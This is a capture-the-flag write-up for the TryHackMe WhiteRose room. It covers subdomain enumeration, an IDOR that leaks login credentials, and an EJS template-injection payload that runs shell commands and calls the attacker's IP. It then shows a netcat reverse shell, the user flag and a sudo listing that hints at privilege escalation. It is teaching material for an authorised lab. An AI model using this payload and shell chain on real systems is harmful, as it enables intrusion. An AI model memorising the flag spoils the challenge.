THM WhiteRose WriteUp
THM WhiteRose WriteUp
Author: r0hit.A
Enumeration
We start with a nmap scan to identify open ports and services running on the target machine.
NMAP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
β― nmap -sC -sV -A cyprusbank.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-15 19:28 IST
WARNING: RST from 10.201.69.6 port 22 -- is this port really open?
Nmap scan report for cyprusbank.thm (10.201.69.6)
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Device type: general purpose|proxy server|media device|WAP|router
Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X|2.4.X (92%), WebSense embedded (86%), Sony embedded (86%), MikroTik RouterOS 6.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4.15 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:mikrotik:routeros:6.15
Aggressive OS guesses: Linux 4.15 (92%), Linux 5.10 - 5.15 (88%), Linux 5.4 (88%), Linux 3.2 - 4.14 (88%), Linux 4.15 - 5.19 (88%), Linux 2.6.32 - 3.10 (88%), Linux 3.7 (87%), Linux 2.6.18 (87%), Linux 3.2.0 (86%), Websense Content Gateway (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 307.03 ms 10.11.0.1
2 ... 3
4 370.10 ms cyprusbank.thm (10.201.69.6)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.40 seconds
RustScan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
β― rustscan -a cyprusbank.thm
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here π
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.201.69.6:22
Open 10.201.69.6:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-15 19:29 IST
Initiating Ping Scan at 19:29
Scanning 10.201.69.6 [4 ports]
Completed Ping Scan at 19:29, 0.36s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:29
Scanning cyprusbank.thm (10.201.69.6) [2 ports]
Discovered open port 22/tcp on 10.201.69.6
Discovered open port 80/tcp on 10.201.69.6
Completed SYN Stealth Scan at 19:29, 0.38s elapsed (2 total ports)
Nmap scan report for cyprusbank.thm (10.201.69.6)
Host is up, received echo-reply ttl 61 (0.34s latency).
Scanned at 2025-09-15 19:29:53 IST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
β― gobuster dir -u http://cyprusbank.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cyprusbank.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1273831 / 1273831 (100.00%)
The directory Scan did not yield any results.
Feroxbuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
β― feroxbuster --url=http://cyprusbank.thm/ --wordlist=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --redirects
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.11.0
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://cyprusbank.thm/
π Threads β 50
π Wordlist β /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
π Status Codes β All Status Codes!
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.11.0
π Config File β /etc/feroxbuster/ferox-config.toml
π Extract Links β true
π HTTP methods β [GET]
π Follow Redirects β true
π Recursion Depth β 4
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Management Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
404 GET 7l 13w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 8l 24w 252c http://cyprusbank.thm/
[####################] - 65m 478989/1273818 2h found:1 errors:900
[####################] - 65m 478975/1273818 122/s http://cyprusbank.thm/
Subdomain Enumeration
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cyprusbank.thm/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.cyprusbank.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
www [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 407ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 449ms]
We found two subdomains www.cyprusbank.thm and admin.cyprusbank.thm. The www subdomain is same as the main domain. The admin subdomain redirects to another page.
On enumerating the admin.cyprusbank.thm subdomain, we find a chat page with the url http://admin.cyprusbank.thm/messages/?c=5.
Trying IDOR attack on the chat page, we find a message with some credentials.
Credentials found in the message:
1
2
3
Gayle Bev:p~]P@5!6;rs558:q
On logging in with the above credentials, we find Tyrell Wellickβs Phone Number.
Exploitation
If we intercept a request and change it by omitting parameters such as the password, an error message appears. This tells us that ejs files are included.
Testing the name and password parameters for vulnerabilities like SQL or SSTI, we do not find anything. So, letβs fuzz for any other parameters the /settings endpoint might accept.
Using ffuf for this, we discover a couple of interesting parameters:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
β― ffuf -u 'http://admin.cyprusbank.thm/settings' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -H 'Cookie: connect.sid=s%3AMwjzKA3EcBUXIsqGNDDaHARGh5B7JYwk.jwhk7KbGBNbC46HXtU8Ln%2BqMzdigbh1ZTMDnal6RC24' -mc all -d 'name=test&password=test&FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 100 -fs 2098
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://admin.cyprusbank.thm/settings
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: connect.sid=s%3AMwjzKA3EcBUXIsqGNDDaHARGh5B7JYwk.jwhk7KbGBNbC46HXtU8Ln%2BqMzdigbh1ZTMDnal6RC24
:: Data : name=test&password=test&FUZZ=test
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: all
:: Filter : Response size: 2098
________________________________________________
.php [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 385ms]
wp-admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 385ms]
update [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 386ms]
login [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 386ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 389ms]
.txt [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
cgi-bin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
includes [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
themes [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
index [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
The request with the payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /settings HTTP/1.1
Host: admin.cyprusbank.thm
Content-Length: 144
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://admin.cyprusbank.thm
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://admin.cyprusbank.thm/settings
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3ABo8e6CmD1qlAkOmYWwhf-pjkFQVHDbUD.7BszZhu%2FOVFfK6HftH4wlJjrpqT4pAasmy1RLiGCU5k
Connection: keep-alive
name=a&password=test&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('curl 10.11.140.158');s
The response indicates successful SSTI exploitation.
Uploading a simple python rev shell and getting the rev shell and stablising it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
β― nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.140.158] from (UNKNOWN) [10.201.69.6] 46376
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
web@cyprusbank:~/app$ export TERM=xterm
export TERM=xterm
web@cyprusbank:~/app$ ^Z
zsh: suspended nc -lvnp 443
β οβ ο zshβ ο Infinityξ½kaliβ 31.736s Β· 15/09/25 20:33
β[ ξ¬ ]
β― stty raw -echo; fg
[1] + continued nc -lvnp 443
web@cyprusbank:~/app$
User Flag
1
2
3
4
5
6
7
8
9
10
11
web@cyprusbank:~/app$ ls
components node_modules package-lock.json static
index.js package.json routes views
web@cyprusbank:~/app$ cd ../
web@cyprusbank:~$ ls
app user.txt
web@cyprusbank:~$ cat user.txt
THM{4lways_upd4te_uR_d3p3nd3nc!3s}
web@cyprusbank:~$
Privilege Escalation
Check the sudo permissions for the web user.
1
2
3
4
5
6
7
8
9
10
web@cyprusbank:~$ sudo -l
Matching Defaults entries for web on cyprusbank:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User web may run the following commands on cyprusbank:
(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
web@cyprusbank:~$
This post is licensed under CC BY 4.0 by the author.